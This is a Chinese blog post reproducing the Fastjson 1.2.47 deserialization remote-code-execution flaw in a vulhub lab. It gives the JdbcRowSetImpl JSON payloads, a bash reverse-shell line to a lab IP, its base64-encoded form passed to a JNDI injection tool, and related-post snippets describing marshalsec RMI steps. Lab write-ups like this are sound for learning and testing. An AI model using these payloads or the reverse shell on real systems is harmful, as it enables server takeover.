漏洞复现 Fastjson 1.2.47-rce

已于 2024-01-08 13:47:11 修改
阅读量915 收藏 22
点赞数 21
文章标签: 安全
于 2024-01-05 16:27:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Lucky1youzi/article/details/135411071
版权

一.漏洞描述

Fastjson是阿里巴巴公司开源的一款json解析器,其性能优越,被广泛应用于各大厂商的Java项目中。fastjson于1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令

二.影响版本

1.2.47

三.漏洞复现

1.准备vulhub环境

path: /vulhub-master/fastjson/1.2.47-rce

启动环境:docker-compose up -d

访问http://靶机ip:8090 可看到一个json对象被返回

2.漏洞检测

用burp得扩展插件FastjsonScan来进行检测,将拦截得包右击鼠标发送Extensions/FastjsonScan  ,如果扫描的目标存在漏洞,在窗口下面的Request窗口会展示使用的payload,如果没有漏洞,则会展示原始的请求与响应

POC: 注意这里得ip是攻击IP

{
    "axin":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "is":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://192.168.56.136:1099/slgipa",
        "autoCommit":true
    }
}

使用dnslog测试:

3.漏洞利用

利用 JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar 工具开启RMI服务器

构造反弹shell,进行base64编码,推荐在线工具,可以快速做bash反弹shell命令​​​​​java命令执行payloads - 小草窝博客

bash -i >& /dev/tcp/192.168.56.136/1234 0>&1

监听1234端口 

开启RMI服务  注意:所有IP均为攻击IP

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjU2LjEzNi8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}" -A "192.168.56.136"

 

POC:  rmi://192.168.56.136:1099/nb7kfd 是上面命令生成得结果

{
    "axin":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "is":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://192.168.56.136:1099/nb7kfd",
        "autoCommit":true
    }
}

获得shell,成功执行命令

Lucky1youzi
关注
  • 21
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
fastjson-1.2.47-API文档-中英对照版.zip
04-08
赠送jar包:fastjson-1.2.47.jar; 赠送原API文档:fastjson-1.2.47-javadoc.jar; 赠送源代码:fastjson-1.2.47-sources.jar; 包含翻译后的API文档:fastjson-1.2.47-javadoc-API文档-中文(简体)-英语-对照版....
fastjson-1.2.47-API文档-中文版.zip
04-08
赠送jar包:fastjson-1.2.47.jar; 赠送原API文档:fastjson-1.2.47-javadoc.jar; 赠送源代码:fastjson-1.2.47-sources.jar; 包含翻译后的API文档:fastjson-1.2.47-javadoc-API文档-中文(简体)版.zip 对应...
漏洞-CVE-2022-24112 APISIX远程代码执行漏洞原理与
关注网络安全、云原生安全
07-15 1482
由于代码逻辑问题,没有覆盖为真实ip,导致绕过了请求限制,且发送请求有默认的key,通过发送请求注册路由,并使用batch-requests插件执行了命令。
漏洞-Xstream(CVE-2021-29505)
aming小老弟
06-01 1647
Xstream
fastjson漏洞 - Fastjson1.2.47反序列化漏洞
HAKUNAMATATATTA的博客
01-06 2371
Fastjson 是阿里巴巴公司开源的一款 JSON 解析器,它可以解析 JSON 格式的字符串,Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 Java Bean。
fastjson反序列化漏洞(1.2.47-rce)
siu~
10-18 442
FastJson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。 通俗理解就是:漏洞利用fastjson autotype在处理json对象的时候,未对@type字段进行完全的安全性验证,攻击者可以传入危险类,并调用危险类连接远程rmi主机,通过其中的恶意类执行代码。攻击者通过这种方式可以实远程代码执行漏洞的利用,获取服务器的敏感信息泄露,甚至可以利用此漏洞进一步对服务器数据进行修改,增
Fastjson<=1.2.47-RCE反序列化漏洞(CNVD‐2019‐22238)保姆级教程
精品博客,你值得一看~
08-10 485
Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型,其 次,Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法,那么当组件 开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流 程进入特定类的特定setter或者getter方法中,若指定类的指定方法中有可被恶意利用的逻辑(也 就是通常所指的“Gadget”),则会造成一些严重的安全问题。
漏洞Fastjson_1.2.47_rce
过期的秋刀鱼
11-04 622
Fastjson是阿里巴巴公司开源的一款json解析器,其性能优越,被广泛应用于各大厂商的Java项目中。fastjson于1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。后可向其POST新的JSON对象,后端会利用fastjson进行解析。发送POC到FastJson服务器,通过RMI协议远程加载恶意类。构造反弹shell,进行base64编码。将content-type修改为。即可看到一个json对象被返回。
Fastjson【RCE1.2.47】漏洞
02-24 1049
Fastjson漏洞原理和RCE1.2.47漏洞
渗透测试-Fastjson 1.2.47 RCE漏洞
道阻且长,行则将至。
07-11 6937
漏洞概述 Fastjson是阿里巴巴公司开源的一款 json 解析器,其性能优越,被广泛应用于各大厂商的Java项目中。Fastjson 近几年被爆出的反序列化 RCE 漏洞影响无数厂商,2017年官方主动爆出了 fastjson 1.2.24 的反序列化漏洞以及升级公告,fastjson 于1.2.24 版本后增加了反序列化白名单。 而在2019年6月,fastjson 又被爆出在 fastjson< =1.2.47 的版本中,攻击者可以利用特殊构造的 json 字符串绕过白名单检测,成功执行任意
fastjson1.2.47RCE漏洞
Mrs_H的博客
10-04 1882
Fastjson1.2.47RCE漏洞 前言 我在上一篇文章中提到了我在长安杯打比赛,有一道我怎么也看不懂的题目,也就是当时“soeasy”。当我我查阅资料以及看了其他师傅们的wp之后,我发这是Fastjson的一个RCE漏洞。因为以前接触Java的时间比较短,还不够熟悉,所以就去搞了个环境这个Fastjson的RCE漏洞。也就有了这篇文章。 环境准备 为了方便起见,我这次直接选择了vulhub的docker环境,有两种方式可以去获得项目源码 一种是直接在github上down下来 https:/
SonarQube安全扫描常见问题
帅小缙的大脑风暴❤
06-11 479
SonarQube质量配置之扫描常见问题与问题修
振弦采集仪在隧道工程中的安全监测与控制研究
最新发布
duxi222333的博客
06-13 500
通过安装振弦传感器,可以实时监测地下水位的变化情况,并采取相应的措施来保证隧道的安全。通过安装振弦传感器,可以实时监测地层的变形情况,并采取相应的措施来保证隧道的安全。同时,振弦采集仪也可以用于隧道施工期间的地层补偿控制,以减少地层的变形对施工的影响。总结,隧道工程的安全监测与控制是非常重要的工作,而振弦采集仪作为一种高精度和灵敏度的仪器,可以有效地监测和控制隧道工程中的地层变形、地下水位变化和地震影响等情况。振弦采集仪具有高精度和灵敏度的特点,能够对隧道工程中发生的微小变形进行准确的监测和控制。
展会邀请 | 龙智即将亮相2024上海国际嵌入式展,带来安全合规、单一可信数据源、可追溯、高效协同的嵌入式开发解决方案
weixin_49715102的博客
06-09 981
凭借在DevSecOps领域的深厚积累,龙智在全球范围内遴选优秀的专业工具,为嵌入式开发行业打造了专属的嵌入式开发解决方案,并提供专业咨询、方案定制、实施部署、专业培训、定制开发等一站式服务支持。等全球专业工具,覆盖嵌入式软件单元测试、静态代码分析、需求管理、版本控制、生命周期管理及项目管理、知识库管理等领域,助力企业实安全合规、可追溯、单一可信数据源、高效协同的嵌入式开发。并且嵌入式系统往往非常杂,需要全面的测试覆盖、高效的测试执行,才能确保系统的可靠性和正确性,以及产品的及时交付。
《软件定义安全》之八:软件定义安全案例
大龄IT民工
06-13 1169
Embrane是一家虚拟设备提供商,由Cisco公司前员工创立,该公司致力于实网络功能实体的软件化,旨在研发出多服务、分布式软件架构的网络服务产品。它于2015年4月被Cisco公司收购。Embrane的软件定义架构称为Heleos,利用虚拟通信设备代替原有基于专有硬件平台的设备,通过一个集中的控制台对虚拟设备进行管理和控制。Heleos与原来的应用交付网络(ADN)产品较为接近,是基于软件的L4~L7虚拟设备,包括负载均衡产品、防火墙、VPN产品和SSLOffload Engine。
Java中的安全管理器和权限控制
weixin_53840353的博客
06-13 576
Java安全管理器是一种允许应用程序在运行时检查对系统资源(如文件和网络)的访问权限的机制。通过定义和安装自定义的安全策略,程序员可以控制哪些代码能够执行特定的操作,从而保护系统资源的安全。@Override// 自定义安全策略throw new SecurityException("写文件操作被禁止!");try {// 尝试写文件操作System.err.println("安全异常:" + e.getMessage());在这个示例中,自定义的禁止所有文件写操作。
fastjson1.2.47漏洞
07-27
根据引用\[1\]和引用\[2\]的内容,可以使用LDAP方法来利用fastjson1.2.47的漏洞。在实战情况下,推荐使用LDAP方法进行利用。fastjson1.2.47过滤了许多恶意类的上传姿势以及关闭了autoType,但是并不阻挡攻击者的攻击步骤。在fastjson中存在一个全局缓存,当有类进行加载时,如果autoType没有开启,会尝试从缓存中获取类,如果缓存中有,则直接返回。因此,可以通过上传一个带有恶意类的json数据,让它执行并存入缓存,从而绕过漏洞防护机制。\[2\] 具体的漏洞步骤如下: 1. 首先,需要启动一个RMI服务器,可以使用以下命令:java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://本机IP:1222/#Exploit" 9999。这个命令将在本地的1222端口上启动一个RMI服务器,并将其绑定到9999端口上。\[3\] 2. 接下来,需要构造一个恶意的json数据,其中包含恶意类的payload。可以使用各种方法来构造这个json数据,例如手动编写或使用工具生成。 3. 将构造好的恶意json数据发送给目标系统,触发fastjson解析该数据的过程。 4. 当fastjson解析恶意json数据时,会尝试从缓存中获取类。由于autoType没有开启,fastjson会尝试从缓存中获取类,如果缓存中有,则直接返回。 5. 通过这种方式,攻击者可以绕过fastjson漏洞防护机制,执行恶意代码。 需要注意的是,漏洞仅用于安全研究和测试目的,未经授权的利用可能涉及违法行为,请遵守法律法规。 #### 引用[.reference_title] - *1* *3* [Fastjson命令执行漏洞(1.2.47和1.2.24)](https://blog.csdn.net/xiaobai_20190815/article/details/124117105)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [fastjson1.2.47漏洞](https://blog.csdn.net/m0_63699746/article/details/131551535)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值